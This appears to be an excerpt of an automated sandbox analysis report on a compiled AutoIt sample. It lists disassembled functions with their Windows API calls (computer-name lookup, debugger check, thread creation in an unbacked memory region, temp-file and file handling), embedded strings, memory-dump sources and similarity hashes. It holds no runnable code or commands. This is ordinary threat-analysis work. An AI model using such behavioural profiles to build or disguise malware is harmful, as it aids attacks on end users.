Instruction Fuzzy Hash: 2431706040C384AED7119B258855F2BBFE0EF92716F4885CEEC94A7291D3B9880C87A7

Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00404CBA

Strings

EA06, xrefs: 0043D8CC
AU3!P/I, xrefs: 00404CB4

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/I$EA06
API String ID: 4104443479-1914660620
Opcode ID: be4a598cdef8c251a5adadd267ea1991f2ed74b36d28d1cb344cd6b9d9c92c66
Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
Opcode Fuzzy Hash: be4a598cdef8c251a5adadd267ea1991f2ed74b36d28d1cb344cd6b9d9c92c66
Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA

Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043EA39
GetOpenFileNameW.COMDLG32(?), ref: 0043EA83

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Strings

X, xrefs: 0043EA51

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA

Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00468DAC
__fread_nolock.LIBCMT ref: 00468DC1

Strings

EA06, xrefs: 00468DF3

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764

Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F

Strings

aut, xrefs: 00469909

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9

Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86

Function 00B597E0 Relevance: 4.8, APIs: 3, Instructions: 307COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(?,00B58FCC,?,00000001,?,00000002,?,?), ref: 00B598BE

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: FileSize
String ID:
API String ID: 3433856609-0
Opcode ID: 6e6d82ca2c839b6c7ab8a9e823714aab8534c568a6a25203cc49cfd9853ed81d
Instruction ID: 210fab5147026b028d14712bddd3387f33085c5d10c369b12e5a006372cef69e
Opcode Fuzzy Hash: 6e6d82ca2c839b6c7ab8a9e823714aab8534c568a6a25203cc49cfd9853ed81d
Instruction Fuzzy Hash: F191236090C381DFEB364B2458557757BE5EB62763F4C05DADC82AB0B2EA698C0DC362

Function 00B77DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 00B77E0F

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: e1241f5e12b7ad10a6e6ac3a3c0ec815a7e19922194f0aea2da16b69a33e3144
Instruction ID: dcff5515763d25f2cad07ef8b10e3105ec867fa6a9a43c2f5031c6630150888b
Opcode Fuzzy Hash: e1241f5e12b7ad10a6e6ac3a3c0ec815a7e19922194f0aea2da16b69a33e3144
Instruction Fuzzy Hash: 0E21B2F06CD3406BDA3556148C0ABB53AF4EF62710F84C4EAA4BD561E2EDA42C048267

Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00404370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A

Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00425733

Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C

__NMSG_WRITE.LIBCMT ref: 0042573A

Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308

Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D

Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C

Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00468D1B

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 00468D2C
_free.LIBCMT ref: 00468D3E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C

Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0043FC01

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 57bf66ca5a732462c0e94270d821faeae316ae41fed408d5a65c112708b386ad
Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
Opcode Fuzzy Hash: 57bf66ca5a732462c0e94270d821faeae316ae41fed408d5a65c112708b386ad
Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A

Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004678DB

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 72df622632d4a502952e0c747a2791bf633f2f1d9c0c323454d63d9f2ecdf6ad
Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
Opcode Fuzzy Hash: 72df622632d4a502952e0c747a2791bf633f2f1d9c0c323454d63d9f2ecdf6ad
Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A

Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00404834

Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389

Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A

Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E

Function 00405C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58

Function 00B55A3B Relevance: 3.1, APIs: 2, Instructions: 51threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00B555C0,?,00000000,00000000), ref: 00B55A51
RtlExitUserThread.NTDLL(00000000), ref: 00B55B11

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: 20dda52f05343662fa1ab2d783af82cbf7808d03b094aeec6b6820099703b69b
Instruction ID: f0e1c26af733ff10ff81583288d77958f733c179b89b3347d091151ce137cebc
Opcode Fuzzy Hash: 20dda52f05343662fa1ab2d783af82cbf7808d03b094aeec6b6820099703b69b
Instruction Fuzzy Hash: 8C11181550DBC14ED7338B68883936AAFE09F63727F5D06DAD9D08A0E3C299094C83A3

Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

std::exception::exception.LIBCMT ref: 00420DEC
__CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
Opcode Fuzzy Hash: f9d52615186fd6d384fb15de7d7a4816dfb19e9dc7db00e42ce54749fafe4e8e
Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD

Function 004255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042562C
__lock_file.LIBCMT ref: 0042564D

